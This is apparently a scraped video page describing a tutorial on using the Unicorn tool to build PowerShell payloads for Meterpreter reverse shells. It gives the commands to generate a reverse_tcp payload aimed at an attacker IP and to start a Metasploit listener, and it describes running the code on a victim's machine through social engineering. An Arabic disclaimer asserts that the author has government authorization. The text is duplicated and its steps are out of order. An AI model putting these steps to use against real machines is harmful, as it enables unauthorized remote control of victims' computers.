Office macro payload created with Unicorn
Magic Unicorn is a simple tool for using a PowerShell downgrade attack that injects shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
تنبيه هام أنا غير مسؤول عن أي استخدام خاطئ لأي معلومات.وأخلي مسؤولية كاملة عن أي استخدام خاطئ في حالة الاستخدام الخاطئ لأي.شيء بخصوص الإختراق ستعرض إلى المسائلة القانونية والسجن الشديد من قبل السلطات الخاصة ب دولتكوأنا مسرح ليا باستخدام الإختراق لأني هذا هو مجال عملي ومعي تصريح من الحكومة الخاصة بالولايات المتحدة الأمريكية.
Table of Contents
Powershell Attack Instruction
HTA Attack Instruction
Macro Attack Instruction
Download the unicorn tool from the git repository:
Powershell Attack Instructions
First, we will try the reverse_tcp payload. As we can see in the main menu all the commands are already written. We just need to replace the IP with our IP.
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444
Now this will give us two files. One is a text file named “powershell_attack.txt” which has the PowerShell code that will be run in the victim’s machine using social engineering and the other is “unicorn.rc” which is a custom Metasploit file that will automatically set all the parameters and start a listener.
These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code and when the victim will execute that code in his command prompt, the attacker will get a reverse connection of his machine.
git clone https://github.com/trustedsec/unicorn.git
Once downloaded, go in the directory and run unicorn with the following command to see all the possible methods.
./unicorn.py
Now let’s set up a listener first. We need to run the Metasploit “unicorn.rc” file using the following command:
msfconsole -r unicorn.rc
Видео Office macro payload created with Unicorn канала anonymous
تنبيه هام أنا غير مسؤول عن أي استخدام خاطئ لأي معلومات.وأخلي مسؤولية كاملة عن أي استخدام خاطئ في حالة الاستخدام الخاطئ لأي.شيء بخصوص الإختراق ستعرض إلى المسائلة القانونية والسجن الشديد من قبل السلطات الخاصة ب دولتكوأنا مسرح ليا باستخدام الإختراق لأني هذا هو مجال عملي ومعي تصريح من الحكومة الخاصة بالولايات المتحدة الأمريكية.
Table of Contents
Powershell Attack Instruction
HTA Attack Instruction
Macro Attack Instruction
Download the unicorn tool from the git repository:
Powershell Attack Instructions
First, we will try the reverse_tcp payload. As we can see in the main menu all the commands are already written. We just need to replace the IP with our IP.
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444
Now this will give us two files. One is a text file named “powershell_attack.txt” which has the PowerShell code that will be run in the victim’s machine using social engineering and the other is “unicorn.rc” which is a custom Metasploit file that will automatically set all the parameters and start a listener.
These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code and when the victim will execute that code in his command prompt, the attacker will get a reverse connection of his machine.
git clone https://github.com/trustedsec/unicorn.git
Once downloaded, go in the directory and run unicorn with the following command to see all the possible methods.
./unicorn.py
Now let’s set up a listener first. We need to run the Metasploit “unicorn.rc” file using the following command:
msfconsole -r unicorn.rc
Видео Office macro payload created with Unicorn канала anonymous
Комментарии отсутствуют
Информация о видео
15 февраля 2022 г. 13:22:39
00:03:10
Другие видео канала
